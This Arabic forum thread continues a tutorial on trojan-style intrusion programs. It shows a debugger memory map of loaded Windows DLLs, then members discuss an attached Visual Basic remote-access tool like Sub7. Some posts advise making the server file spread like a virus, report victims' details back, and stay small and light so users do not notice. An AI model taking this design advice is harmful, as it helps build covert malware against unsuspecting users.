762A0000   00001000   MSASN1                PE header                   Imag 01001002    R               RWE
762A1000   0000C000   MSASN1     .text      code,imports,exports        Imag 01001002    R               RWE
762AD000   00001000   MSASN1     .rsrc      data,resources              Imag 01001002    R               RWE
762AE000   00001000   MSASN1     .reloc     relocations                 Imag 01001002    R               RWE
762C0000   00001000   CRYPT32               PE header                   Imag 01001002    R               RWE
762C1000   0007A000   CRYPT32    .text      code,imports,exports        Imag 01001002    R               RWE
7633B000   00003000   CRYPT32    .data      data                        Imag 01001002    R               RWE
7633E000   00007000   CRYPT32    .rsrc      resources                   Imag 01001002    R               RWE
76345000   00005000   CRYPT32    .reloc     relocations                 Imag 01001002    R               RWE
76360000   00001000   WINSTA                PE header                   Imag 01001002    R               RWE
76361000   0000B000   WINSTA     .text      code,imports,exports        Imag 01001002    R               RWE
7636C000   00001000   WINSTA     .data      data                        Imag 01001002    R               RWE
7636D000   00001000   WINSTA     .rsrc      resources                   Imag 01001002    R               RWE
7636E000   00001000   WINSTA     .reloc     relocations                 Imag 01001002    R               RWE
76670000   00001000   SETUPAPI              PE header                   Imag 01001002    R               RWE
76671000   0006E000   SETUPAPI   .text      code,imports,exports        Imag 01001002    R               RWE
766DF000   00002000   SETUPAPI   .data      data                        Imag 01001002    R               RWE
766E1000   0006E000   SETUPAPI   .rsrc      resources                   Imag 01001002    R               RWE
7674F000   00005000   SETUPAPI   .reloc     relocations                 Imag 01001002    R               RWE
76B20000   00001000   ATL                   PE header                   Imag 01001002    R               RWE
76B21000   0000A000   ATL        .text      code                        Imag 01001002    R               RWE
76B2B000   00003000   ATL        .rdata     imports,exports             Imag 01001002    R               RWE
76B2E000   00002000   ATL        .data      data                        Imag 01001002    R               RWE
76B30000   00003000   ATL        .rsrc      resources                   Imag 01001002    R               RWE
76B33000   00002000   ATL        .reloc     relocations                 Imag 01001002    R               RWE
76B40000   00001000   WINMM                 PE header                   Imag 01001002    R               RWE
76B41000   0001E000   WINMM      .text      code,imports,exports        Imag 01001002    R               RWE
76B5F000   00002000   WINMM      .data      data                        Imag 01001002    R               RWE
76B61000   00009000   WINMM      .rsrc      resources                   Imag 01001002    R               RWE
76B6A000   00002000   WINMM      .reloc     relocations                 Imag 01001002    R               RWE
76D30000   00001000   WMI                   PE header                   Imag 01001002    R               RWE
76D31000   00001000   WMI        .text      data,exports                Imag 01001002    R               RWE
76D32000   00001000   WMI        .rsrc      resources                   Imag 01001002    R               RWE
76D33000   00001000   WMI        .reloc     relocations                 Imag 01001002    R               RWE
76D40000   00001000   MPRAPI                PE header                   Imag 01001002    R               RWE
76D41000   00012000   MPRAPI     .text      code,imports,exports        Imag 01001002    R               RWE
76D53000   00001000   MPRAPI     .data      data                        Imag 01001002    R               RWE
76D54000   00001000   MPRAPI     .rsrc      resources                   Imag 01001002    R               RWE
76D55000   00001000   MPRAPI     .reloc     relocations                 Imag 01001002    R               RWE
76D60000   00001000   iphlpapi              PE header                   Imag 01001002    R               RWE
76D61000   0000F000   iphlpapi   .text      code,imports,exports        Imag 01001002    R               RWE
76D70000   00001000   iphlpapi   .data      data                        Imag 01001002    R               RWE

القسم الثاني من الكود

بعدة في الطريق

--

تم تعديل بواسطه jaas
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

القسم 2

76D70000   00001000   iphlpapi   .data      data                        Imag 01001002    R               RWE
76D71000   00003000   iphlpapi   .rsrc      resources                   Imag 01001002    R               RWE
76D74000   00001000   iphlpapi   .reloc     relocations                 Imag 01001002    R               RWE
76D80000   00001000   DHCPCSVC              PE header                   Imag 01001002    R               RWE
76D81000   00015000   DHCPCSVC   .text      code,imports,exports        Imag 01001002    R               RWE
76D96000   00001000   DHCPCSVC   .data      data                        Imag 01001002    R               RWE
76D97000   00002000   DHCPCSVC   .rsrc      resources                   Imag 01001002    R               RWE
76D99000   00001000   DHCPCSVC   .reloc     relocations                 Imag 01001002    R               RWE
76DA0000   00001000   WZCSvc                PE header                   Imag 01001002    R               RWE
76DA1000   00025000   WZCSvc     .text      code,imports,exports        Imag 01001002    R               RWE
76DC6000   00001000   WZCSvc     .data      data                        Imag 01001002    R               RWE
76DC7000   00006000   WZCSvc     .rsrc      resources                   Imag 01001002    R               RWE
76DCD000   00003000   WZCSvc     .reloc     relocations                 Imag 01001002    R               RWE
76DE0000   00001000   netman                PE header                   Imag 01001002    R               RWE
76DE1000   0001F000   netman     .text      code,imports,exports        Imag 01001002    R               RWE
76E00000   00001000   netman     .data      data                        Imag 01001002    R               RWE
76E01000   00003000   netman     .rsrc      resources                   Imag 01001002    R               RWE
76E04000   00002000   netman     .reloc     relocations                 Imag 01001002    R               RWE
76E10000   00001000   adsldpc               PE header                   Imag 01001002    R               RWE
76E11000   00020000   adsldpc    .text      code,imports,exports        Imag 01001002    R               RWE
76E31000   00001000   adsldpc    .data      data                        Imag 01001002    R               RWE
76E32000   00001000   adsldpc    .rsrc      resources                   Imag 01001002    R               RWE
76E33000   00001000   adsldpc    .reloc     relocations                 Imag 01001002    R               RWE
76E40000   00001000   ACTIVEDS              PE header                   Imag 01001002    R               RWE
76E41000   00023000   ACTIVEDS   .text      code,imports,exports        Imag 01001002    R               RWE
76E64000   00008000   ACTIVEDS   .data      data                        Imag 01001002    R               RWE
76E6C000   00001000   ACTIVEDS   .rsrc      resources                   Imag 01001002    R               RWE
76E6D000   00002000   ACTIVEDS   .reloc     relocations                 Imag 01001002    R               RWE
76E80000   00001000   rtutils               PE header                   Imag 01001002    R               RWE
76E81000   00009000   rtutils    .text      code,imports,exports        Imag 01001002    R               RWE
76E8A000   00001000   rtutils    .data      data                        Imag 01001002    R               RWE
76E8B000   00001000   rtutils    .rsrc      resources                   Imag 01001002    R               RWE
76E8C000   00001000   rtutils    .reloc     relocations                 Imag 01001002    R               RWE
76E90000   00001000   rasman                PE header                   Imag 01001002    R               RWE
76E91000   0000D000   rasman     .text      code,imports,exports        Imag 01001002    R               RWE
76E9E000   00001000   rasman     .data      data                        Imag 01001002    R               RWE
76E9F000   00001000   rasman     .rsrc      resources                   Imag 01001002    R               RWE
76EA0000   00001000   rasman     .reloc     relocations                 Imag 01001002    R               RWE
76EB0000   00001000   TAPI32                PE header                   Imag 01001002    R               RWE
76EB1000   00025000   TAPI32     .text      code,imports,exports        Imag 01001002    R               RWE
76ED6000   00001000   TAPI32     .data                                  Imag 01001002    R               RWE
76ED7000   00001000   TAPI32     .rsrc      data,resources              Imag 01001002    R               RWE
76ED8000   00002000   TAPI32     .reloc     relocations                 Imag 01001002    R               RWE
76EE0000   00001000   RASAPI32              PE header                   Imag 01001002    R               RWE
76EE1000   00031000   RASAPI32   .text      code,imports,exports        Imag 01001002    R               RWE
76F12000   00001000   RASAPI32   .data      data                        Imag 01001002    R               RWE
76F13000   00001000   RASAPI32   .rsrc      resources                   Imag 01001002    R               RWE
76F14000   00003000   RASAPI32   .reloc     relocations                 Imag 01001002    R               RWE
76F20000   00001000   DNSAPI                PE header                   Imag 01001002    R               RWE
76F21000   0001E000   DNSAPI     .text      code,imports,exports        Imag 01001002    R               RWE
76F3F000   00003000   DNSAPI     .data      data                        Imag 01001002    R               RWE
76F42000   00001000   DNSAPI     .rsrc      resources                   Imag 01001002    R               RWE
76F43000   00002000   DNSAPI     .reloc     relocations                 Imag 01001002    R               RWE
76F50000   00001000   WTSAPI32              PE header                   Imag 01001002    R               RWE
76F51000   00004000   WTSAPI32   .text      code,imports,exports        Imag 01001002    R               RWE
76F55000   00001000   WTSAPI32   .data      data                        Imag 01001002    R               RWE
76F56000   00001000   WTSAPI32   .rsrc      resources                   Imag 01001002    R               RWE
76F57000   00001000   WTSAPI32   .reloc     relocations                 Imag 01001002    R               RWE
76F60000   00001000   WLDAP32               PE header                   Imag 01001002    R               RWE
76F61000   00020000   WLDAP32    .text      code,imports,exports        Imag 01001002    R               RWE
76F81000   00008000   WLDAP32    .data      data                        Imag 01001002    R               RWE
76F89000   00001000   WLDAP32    .rsrc      resources                   Imag 01001002    R               RWE
76F8A000   00002000   WLDAP32    .reloc     relocations                 Imag 01001002    R               RWE
76F90000   00001000   Secur32               PE header                   Imag 01001002    R               RWE
76F91000   0000C000   Secur32    .text      code,imports,exports        Imag 01001002    R               RWE
76F9D000   00001000   Secur32    .data      data                        Imag 01001002    R               RWE
76F9E000   00001000   Secur32    .rsrc      resources                   Imag 01001002    R               RWE
76F9F000   00001000   Secur32    .reloc     relocations                 Imag 01001002    R               RWE
77120000   00001000   OLEAUT32              PE header                   Imag 01001002    R               RWE
77121000   00081000   OLEAUT32   .text      code,imports,exports        Imag 01001002    R               RWE
771A2000   00002000   OLEAUT32   .data                                  Imag 01001002    R               RWE
771A4000   00001000   OLEAUT32   .rsrc      resources                   Imag 01001002    R               RWE
771A5000   00006000   OLEAUT32   .reloc     relocations                 Imag 01001002    R               RWE
771B0000   00001000   ole32                 PE header                   Imag 01001002    R               RWE
771B1000   000FD000   ole32      .text      code,imports,exports        Imag 01001002    R               RWE
772AE000   00006000   ole32      .orpc      code                        Imag 01001002    R               RWE
772B4000   00007000   ole32      .data      data                        Imag 01001002    R               RWE
772BB000   00002000   ole32      .rsrc      resources                   Imag 01001002    R               RWE
772BD000   0000D000   ole32      .reloc     relocations                 Imag 01001002    R               RWE
772D0000   00001000   SHLWAPI               PE header                   Imag 01001002    R               RWE
772D1000   0005A000   SHLWAPI    .text      code,imports,exports        Imag 01001002    R               RWE
7732B000   00001000   SHLWAPI    .data      data                        Imag 01001002    R               RWE
7732C000   00002000   SHLWAPI    .rsrc      resources                   Imag 01001002    R               RWE
7732E000   00005000   SHLWAPI    .reloc     relocations                 Imag 01001002    R               RWE
77340000   00001000   comctl_1              PE header                   Imag 01001002    R               RWE
77341000   00066000   comctl_1   .text      code,imports,exports        Imag 01001002    R               RWE
773A7000   00001000   comctl_1   .data      data                        Imag 01001002    R               RWE
773A8000   0001F000   comctl_1   .rsrc      resources                   Imag 01001002    R               RWE
773C7000   00004000   comctl_1   .reloc     relocations                 Imag 01001002    R               RWE
773D0000   00001000   SHELL32               PE header                   Imag 01001002    R               RWE
773D1000   001DD000   SHELL32    .text      code,imports,exports        Imag 01001002    R               RWE
775AE000   0001C000   SHELL32    .data      data                        Imag 01001002    R               RWE
775CA000   005E0000   SHELL32    .rsrc      resources                   Imag 01001002    R               RWE
77BAA000   0001A000   SHELL32    .reloc     relocations                 Imag 01001002    R               RWE
77C10000   00001000   msvcrt                PE header                   Imag 01001002    R               RWE
77C11000   00047000   msvcrt     .text      code,imports,exports        Imag 01001002    R               RWE
77C58000   00007000   msvcrt     .data      data                        Imag 01001002    R               RWE
77C5F000   00001000   msvcrt     .rsrc      resources                   Imag 01001002    R               RWE
77C60000   00003000   msvcrt     .reloc     relocations                 Imag 01001002    R               RWE
77C70000   00001000   GDI32                 PE header                   Imag 01001002    R               RWE
77C71000   0003B000   GDI32      .text      code,imports,exports        Imag 01001002    R               RWE
77CAC000   00001000   GDI32      .data      data                        Imag 01001002    R               RWE
77CAD000   00001000   GDI32      .rsrc      resources                   Imag 01001002    R               RWE
77CAE000   00002000   GDI32      .reloc     relocations                 Imag 01001002    R               RWE
77CC0000   00001000   RPCRT4                PE header                   Imag 01001002    R               RWE
77CC1000   00067000   RPCRT4     .text      code,imports,exports        Imag 01001002    R               RWE
77D28000   00007000   RPCRT4     .orpc      code                        Imag 01001002    R               RWE
77D2F000   00001000   RPCRT4     .data      data                        Imag 01001002    R               RWE
77D30000   00001000   RPCRT4     .rsrc      resources                   Imag 01001002    R               RWE
77D31000   00004000   RPCRT4     .reloc     relocations                 Imag 01001002    R               RWE
77D40000   00001000   USER32                PE header                   Imag 01001002    R               RWE
77D41000   0005C000   USER32     .text      code,imports,exports        Imag 01001002    R               RWE
77D9D000   00002000   USER32     .data      data                        Imag 01001002    R               RWE
77D9F000   0002B000   USER32     .rsrc      resources                   Imag 01001002    R               RWE
77DCA000   00003000   USER32     .reloc     relocations                 Imag 01001002    R               RWE
77DD0000   00001000   ADVAPI32              PE header                   Imag 01001002    R               RWE
77DD1000   00065000   ADVAPI32   .text      code,imports,exports        Imag 01001002    R               RWE
77E36000   00005000   ADVAPI32   .data      data                        Imag 01001002    R               RWE
77E3B000   0001B000   ADVAPI32   .rsrc      resources                   Imag 01001002    R               RWE
77E56000   00005000   ADVAPI32   .reloc     relocations                 Imag 01001002    R               RWE
77E60000   00001000   kernel32              PE header                   Imag 01001002    R               RWE
77E61000   00075000   kernel32   .text      code,imports,exports        Imag 01001002    R               RWE
77ED6000   00003000   kernel32   .data      data                        Imag 01001002    R               RWE
77ED9000   00066000   kernel32   .rsrc      resources                   Imag 01001002    R               RWE
77F3F000   00006000   kernel32   .reloc     relocations                 Imag 01001002    R               RWE
77F50000   00001000   ntdll                 PE header                   Imag 01001002    R               RWE
77F51000   0006F000   ntdll      .text      code,exports                Imag 01001002    R               RWE
77FC0000   00005000   ntdll      ECODE      code                        Imag 01001002    R               RWE
77FC5000   00005000   ntdll      .data      data                        Imag 01001002    R               RWE
77FCA000   0002C000   ntdll      .rsrc      resources                   Imag 01001002    R               RWE
77FF6000   00003000   ntdll      .reloc     relocations                 Imag 01001002    R               RWE
7F6F0000   00007000                                                     Map  00041020    R E             R E
7FFAE000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFAF000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFB0000   00024000                                                     Map  00041002    R               R
7FFD4000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFD5000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFD6000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFD7000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFD8000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFD9000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFDA000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFDB000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFDC000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFDD000   00001000                         data block of thread 00000  Priv 00021040    RWE             RWE
7FFDE000   00001000                         data block of main thread   Priv 00021040    RWE             RWE
7FFDF000   00001000                                                     Priv 00021040    RWE             RWE
7FFE0000   00001000                                                     Priv 00021002    R               R

وبالتوفيق

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

لن ابالغ لو قلت اننا ربحنا خبيراً جديداً فى الموقع

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

والله الشرف لي ( أن يقرأ مواضيعي خبراء)

وفي ملاحظة ( لست جديد على المنتدى)

وإنما من صناعة هذا المنتدى

وبالتوفيق

تم تعديل بواسطه jaas
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

تم تثبيت الموضوع

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

بجد الموضوع يستحق التثبيت .. انا هتابع معك الدروس أخ jaas فهو بجد درس قيم ..

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

والله تعقدت لين ما دخلت هذا الكود

كان بامكانك ادخاله بالتنسيق الذي ترغب به عن طريق وضعه في صورة ثم ادراجها هنا .

يمكنك تحميل الصور من هذا الرابط www.arabteam2000.picload

و أشكرك كثيرا

===

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

مرحبا بالأعضاء

الظاهر إن مواضيع الإختراع ( تهم العرب أكثر )

وألف شكر لتجاوبكم مع الموضوع

وأتمنى أني قد وفقت في شرحة

في شغلة في الموضوع

وجدت كود لبرنامج إختراق شبية بالسب سفن

ولكن بالفجول بيسك وهو

PIC200191822166194.jpg

تلاقي الكود في الملف المرفق

وسؤحاول البحث عن كود سي ( أعتقد إني شفت واحد)

لكن ما أدري وين

-----------------------------

ومع السلامة

storm.zip

تم تعديل بواسطه jaas
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

مبدع ماشاء الله ,,

الالمام بالسي++ وفهم التعامل مع الذاكرة وفهم طريقة عمل البرامج وتفاعلها مع ملفات ال dll في الوندوز ومع كل هذا فهم جيد لبروتوكولات الشبكات ,, تنتج خليطا بما يسمى بمسوخ الكمبيوتر ,, يمكنهم فعل كل شيء وبأي طريقة , فقط بعض الصبر !!

المهم : الثغرات في مجملها كما ذكر jaas أن تجد عيبا في نظام التشغيل ,, أو هو ليس عيب في نظرهم ولربما كان فكرة عبقرية لتسهيل التخاطب مثلا ,, لكن مع اختلاطها بثغرات مختلفة أخرى من برامج أخرى تصبح الفكرة العبقرية ثغرة أيضا ,,

لكن لايمكن تسمية برامج التجسس و أحصنة الطروادة بثغرات ,, لأنه يتم تصميمها تحت الطلب "تفصيل" ,, وليست موجودة في أي جهاز كمبيوتر كما الحال في الثغرات ,, الثغرات كثيرة جدا ,, وكنت أتمنى منذ الأزل أن أجد الوقت الكافي والتشجيع اللازم لنستطيع أن ننبش فيها قليلا ,, أهم وأكثر هذه الثغرات التي أثارت فضولي هي ثغرة خدمة ال RPC في دودتي Blaster و Sobig ,, وأخيرا ثغرة خدمة ال Ipsec "كما فهمت انا" في دودة ساسر الأخيرة ,,

لماذا لانقوم بتشريح بعض هذه الثغرات لفهم الية عملها ,, ستزيدنا خبرة كثيرا جدا ,, ولدينا كل المقومات لذلك ,, لدينا من يحب البحث وايجاد البلاوي المستخبية في المواقع ,, ولدينا أصحاب الأسمبلي والديبجينج ,, وأصحاب السي ومن يعرف في خفايا نظام التشغيل وبالدوال الغريبة التي تفعل البلاوي أمثال CreateFile ,,

هذه فكرة ,, ولننظر ماذا نفعل بعدها ,,

,,,,,,,,,,,,

استمر يا jaas وضع ماتريد من أكواد ,, لاغبار على ذلك باذن الله ,,

سأبحت بشكل ما عن ثغرة ال RPC اليوم ,,

تم تعديل بواسطه HGB
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

:)

يمكن دمج كذا طريقه من طرق الإختراق مع بعض ، فمثلا عن طريق إستخدام برنامج إختراق و تصمميم ملف السيرفر الخاص به ليعمل مثل الفيروسات فى طريقة الإنتشار ، سيكون برنامج إختراق قوى جدا و بالطبع ستخبر كل نسخه جديده من ملف السيرفر على إرسال معلومات جهازها إلى مصصم البرنامج .

على فكره طريقة البرامج قديمه بالفعل و لكنها فعاله للغايه فى نقطه واحده وهى إختيار من ستقوم بإختراقه لذلك هى مازالت مستخدمه إلى الأن و تؤدى الغرض منها بالرغم من وجود بعض طرق إرسال المعلومات إلى مالك السيرفر لا تعمل أصلا أو بمرور الوقت أو بإكتشاف طريقة الإرسال و سدها من جانب القئمين على تصميم الأنظمه مثل ما حدث منذ عام عندما اغلقت هوتميل سيرفرات تبادل الرسائل الخاصه بها mx1,mx2,mx3,mx4.hotmail.com مما أدى إلى تعطيل خاصية إرسال عن طريق البريد فى معظم برامج الإختراق وقتها !

الموضوع جبار و هو اساس الأمن فى الشبكات من خلال الشبكات ، شكرا يا أخ jaas على إفتتاحك الإسطورى للموضوع و شكرا على كود برنامج الإختراق ، كنت أبحث عن برنامج إختراق عربى أو حتى محاوله ،

بالمناسبه ، لقد أنتهيت تقريبا من بناء أول إصدار من Handle-X ، يمكنكم الإطلاع على صفحه له على الرابط الأتى : http://www.1t.2t.3t.4t.com/Handle-X.html

كنت أريد تطويره و ذيادة قوة البرنامج من حيث الإتصال و التحكم فى الشبكات المحليه ، فمن لديه معلومات ن هذا المجال فشكرا له .

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

تشكر يا jaas لان موضوعك اعجبني و واضح انه اعجب الجماهير و مجهود رائع يا احمد، ماهو اقرب برنامج للذي عملتموه من البرامج المعروفة؟ وهل من الممكن او تفكرون بتسويقه في مرحلة ما؟ هل هناك نسخة تجريبية؟

تم تعديل بواسطه عماد الخليل
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

أقرب برنامج ل Handle-X من ناحية الشكل المبدئى هى برامج الإختراق مثل ProRat or Optix و لكن من ناحية العمل فإنه أعم بكثير و يحتوى على أدوات كثيره للشبكات أو هكذا أتمنى أن يكون .

عندما يصبح مثل ما نطمح ، سيتم تسويقه بالطبع و لكن فى غضون شهر ستكون النسخه التجريبيه له متاحه لنا نحن (بالمناسبه عندما بدأنا فى صياغته كان إهتمامنا الأول بالمبرمج العربى أو المحترف العربى لأن يكون هو المستخدم رقم 1 له و لكن مع تطور الأحداث ومع فكرة تسويقه أصبح الإتجاه إلى شركات التى تستخدم الشبكات LANS وأمن المعلومات ) .

أمامى مشكله أو موضوع أقف أمامه الأن إذا يمكن أن يساعد أحد فيه و هو التحكم الكامل فى الشبكات المحليه Lans أو طرق الإتصال بجهاز بداخلها من خارجها وما إلى ذلك .

إذا كان لديك فكره أخرى أخى عماد ويمكنك القيام بها فى Handle-X ،فإنه يمكن ذلك فى فريق التطوير .

بالتوفيق للجميع

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

السلام عليكم

فعلا موضوع كبير جدا واكتر من رائع والصراحة هناك اشياء كتيرة لم افهمها لانى مازلت جديد فى الميدان واسئلتى هى كالتالى

باى لغة برمجة صنعت برنامجك وكيف ممكن اميز بينها من خلال قرائت الكود متلا نقول هدا كود بالc++وهدا بالc وهكدا

لو اردت معرفت سورس برنامج معين كيف اعمل وماهى البرامج التى يجب التوفر عليها

بالنسبة للمنافد هناك عدد هائل منها هل اكتفى فقط بارسال باتش وهو سيفتح منفد ام على صنع باتش خاص بمنفد معين?

ماهى ابسط لفة برمجة ممكن اتعلمها كمبتدئ?

اخيرا اتمى تفيدونى وجزاكم الله خيرا

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

يمكن السؤال ليس موجهة لي

المهم

باى لغة برمجة صنعت برنامجك وكيف ممكن اميز بينها من خلال قرائت الكود متلا نقول هدا كود بالc++وهدا بالc وهكدا

فجول بيسك

ولتمييز البرامج بأي لغة (برامج الفجول بيسك لها مكاتب ربط معروفة)

أما البرامج الأخرى (تحتاج برنامج خاص للتمييز)

لو اردت معرفت سورس برنامج معين كيف اعمل وماهى البرامج التى يجب التوفر عليها

عن طريق الديسمبلي أو فك التجميع والبرنامج موجود مع الدرس الثاني

بالنسبة للمنافد هناك عدد هائل منها هل اكتفى فقط بارسال باتش وهو سيفتح منفد ام على صنع باتش خاص بمنفد معين

أكيد برامج التجسس تقوم بفتح منفذ جديد تحددة من محرر الخادم

ماهى ابسط لفة برمجة ممكن اتعلمها كمبتدئ

أعتقد عند إختيار لغة برمجة لا يتم المقارنة بدرجة بالسهولة

بل ماذا تريد أن تفعل؟

وبما أننا في شرح للتجسس والإختراق

لا أعتقد أن أسهل لغة الفجول بيسك تفي بالغرض

لأنها تحتاج ملفات تشغيل وهي لا تتميز بالسرعة المطلوبة

لهذا النوع من البرمجة (برمجة الإختراق)

دائما لغة السي هي الأفضل

--

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

---| إقتباس |---

وهي لا تتميز بالسرعة المطلوبة

-----------------

يتوقف ذلك على طريقة كتابة الكود وعلى تصميم الكود وليس على اللغه كما يعتقد الكثيرين ، فى البرامج الكبيره الحجم يمكن أن تكتب كود على سى بطريقه معقده تسبب وقوف كامل للججهاز فى حين أن هناك طرق أخرى توضح مدى سرعة اللغه ، ولكن فى تساوىطريقى كتابة الكود فنظريا السى اسرع بمراحا من فجوال بيسيك بالطبع .

أيضا لا يمكن تنفيذ برامج بهذا الحجم على السى الأن ، أولا لأن البرنامج الزبون له واجهه يصعب تصميمها على سى مثلا ،،

باقى أن أذكر أن معظم البرامج المشابهه والمنتشره أو التى إنتشرت فى الوسط مصممه على دلفى ولا أدرى السبب (لقلة معلوماتى عن دلفى) من أمثال sup 7 , prorat , amits , ...

---| إقتباس |---

لأنها تحتاج ملفات تشغيل

-----------------

هذه النقطه مشتركه فى جميع اللغات الموجوده حاليا و أصبحت ملفات التشغيل مدعومه دعم كامل مع نظم التشغيل ، فمثلا مشكلة السيرفر فى هذا البرنامج هو أنه يحتاج إلى vbruntime dll وهذا غير موجود فى 98 أو مى ، ولكنه موجود فى نظم ال nt/xp ،،

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

بالمناسبه معظم برامج الإختراق المشهوره التى كانت مصممه على وندوز 9x لا تعمل الأن بشكل جيد مع xp وذلك لإختلاف المنصات وإختلاف طرق التعامل مع ملفات النظام ،

أكبر مثال على ذلك أنه يمكنك تشغيل سيرفر ملف أى من هذه البرامج الأن وتتابعه من Task Manageer والتحكم التام به من حيث الإغلاق و حجم الذاكره التى يستهلكها وما إلى ذلك ،

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

مرحبا أخ أحمد ( الظاهر إنك من المتعصبين للفجول بيسك)

صدقني من حقك

لأن برامج الفجول بيسك عملية فعلا ومنتجة

ولكن يستحيل مقارنتها بالسي

قم بكتابة برنامج فارغ وفقط بة مسج بكس

وترجم البرنامج

وأنا سأقوم بكتابة نفس البرنامج بالسي ( فقط مسج)

وسنرى الحجم النهائي لكل برنامج

وسنوزعها لكل الأعضاء ( وأنا متأكد )

أن البرنامج المكتوب بالفجول بيسك سيعمل عند تقريبا 30 بالمئة

أما السي 100\100 حتى لو عندة أقل من وندوز 95

أيضا لا يمكن تنفيذ برامج بهذا الحجم على السى الأن ، أولا لأن البرنامج الزبون له واجهه يصعب تصميمها على سى مثلا ،،

والله أستاذ أحمد هذا الكلام غريب

هل تعتقد أن برنامج بالفجول بيسك تشاهد نافذتة وتضع عليها أزرار

بالسحب والفلت تكون أدق من واجهة فارغة تقوم بوضع عليها الأزرار بالكود(مثل السي)

عندما تضع زر بالكود فإنك تضعهة بإحداثيات دقيقة جدا

أفضل من وضعة بالسحب والفلت

أما إذا كنت تقصد اللمسة الجمالية؟

فأصلا نشأتها بالسي

حاول بأن تقوم بجعل نافذة برنامجك شفافة بدون تدخل كود من السي وهو(دوال API)

لن تستطيع

باقى أن أذكر أن معظم البرامج المشابهه والمنتشره أو التى إنتشرت فى الوسط مصممه على دلفى ولا أدرى السبب (لقلة معلوماتى عن دلفى) من أمثال sup 7 , prorat , amits , ...

في إعتقادي لأن لغة الباسكال أو مترجم الدلفي تدرس في أغلب الجامعات

وأغلب البرامج الذي ذكرت عبارة عن مشاريع طلابية كان بداية إستخدامها

في السكن الجامعي ( وأثار تحدي بين الطلاب وادى إلى شهرتها)

هذا والله أعلم

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

السلام عليكم ,,

لست للتعصب الأعمى للسي++ ,, لكن كل دوال ال Win32 API التي هي عصب لغات البرمجة الأخرى مكتوبة بالسي++ ,, تخيل ذلك ,,

يعني كل لغات البرمجة التي تعمل على وندوز يجب أن تمر بطبقة دوال السي المكتوبة مسبقا لتعمل ,,

دالة MsgBox في اللفيجوال بيسك ليست الا تغليف لدالة ال Win32 API وهي MessageBox(HWND,LPCTSTR,LPCTSTR,INT);

والموجودة في المكتبة User32.LIB ,,

كتابة كود بالفيجوال بيسك سيحتاج لمكتبات ال RunTime للفيجوال بيسك ,, لاأعرف هل يمكن حقنها مع ملف ال EXE النهائي أم لا ,, المهم حتى لو حقنت سيصبح حجم الملف النهائي مروعا ,,

برامج ال MFC تحتاج لمكتبات ال MFC والتي اذا كانت موجودة تعطي ملفات تنفيذية بحجم 50 كيلوبايت كما أذكر ,, و300 كيلوبايت اذا تم ربطها بشكل ساكن مع ملف ال EXE ,,

لكن بالطبع لا يحبذ كتابة برامج الفيروسات وأحصنة الطروادة بال MFC ,, لأنها مجرد واجهة ايضا تغلف ال API ,,

لذا اذا استخدمنا ال API بشكل مباشر سيعمل الملف التنفيذي وعلى أي وندوز مهما كان ,, وحجم الملف النهائي 28 كيلوبايت للحجم الأدنى ,,

كل هذه ألأحجام بالاستناد لمصرف الفيجوال سي++ ,,

,,,,,,,,,,,,,,,,,,,,,,,,,,,

بالنسبة لمكونات COM يمكن انشاء ملفات dll بها يصل حجمها ل 20 كيلوبايت للحد الأدنى كما لاحظت بالسي++ وابستخدام ال ATL ,,

بالنسبة للدوت نت تعطي ملفات "تخيل !!" بحجم 8 كيلوبايت فقط !!

طبعا يجب أن يكون الوندوز به .NET FrameWork لتعمل هذه البرامج ,,

بالنسبة للسرعة فبرامج التجسس لن تحتاج لسرعة كبيرة كما أعتقد ,, لأن أغلب الوقت ستقوم بأداء مهام لاتأخذ من المعالج الا اليسير لكي لايلاحظ المستخدم ذلك ,,

باقى أن أذكر أن معظم البرامج المشابهه والمنتشره أو التى إنتشرت فى الوسط مصممه على دلفى ولا أدرى السبب (لقلة معلوماتى عن دلفى) من أمثال sup 7 , prorat , amits

كتابة البرامج كال Sub 7 وغيره بالباسكال او الفيجوال سي++ أو الفيجوال بيسك له نفس الأداء تماما ,, لكن مايؤثر هو الملف ال client الذي ترسله للضحية ,, يجب أن يكون صغيرا بما فيه الكفاية حتى لو أضفت له أطنان من المهام التي تستفيد من الكثير من المكتبات ,, في هذه الحال لامنافس للسي++ أبدا ,, لأن كل ماتحتاجه موجود في أي نظام تشغيل وندوز ,,

تم تعديل بواسطه HGB
0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه

أخى jass ، إقرأ ردى النهائى و بالذات "ولكن فى تساوىطريقى كتابة الكود فنظريا السى اسرع بمراحا من فجوال بيسيك بالطبع "

بمعنى أنه نظريا بدوت تجريب عمليا حتى ، سى أسرع برماحل و للأسباب التى ذكرها HGB ،

